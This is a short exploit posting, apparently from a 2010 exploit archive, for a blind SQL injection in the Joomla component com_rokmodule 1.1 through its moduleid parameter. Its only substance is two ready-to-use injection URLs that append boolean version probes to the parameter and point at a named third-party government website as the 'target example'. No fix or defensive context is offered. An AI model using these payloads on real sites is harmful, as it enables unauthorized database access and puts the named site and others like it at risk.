Home / os / win7

Joomla Component com_rokmodule Blind SQLi [moduleid] Vulnera

Posted on 11 April 2010

================================================================== Joomla Component com_rokmodule Blind SQLi [moduleid] Vulnerability ================================================================== # Exploit Title: Joomla Component RokModule Blind SQLi [moduleid] Vulnerability # Date: April 11 2010 # Author: AntiSecurity # Software Link: http://www.rockettheme.com/ # Version: com_rokmodule version 1.1 # Tested on: Linux # Target example http://www.senatedem.ilga.gov/index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=260+AND+SUBSTRING(@@version,1,1)=5 http://www.senatedem.ilga.gov/index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=260+AND+SUBSTRING(@@version,1,1)=4 # Inj3ct0r.com [2010-04-11]

 

TOP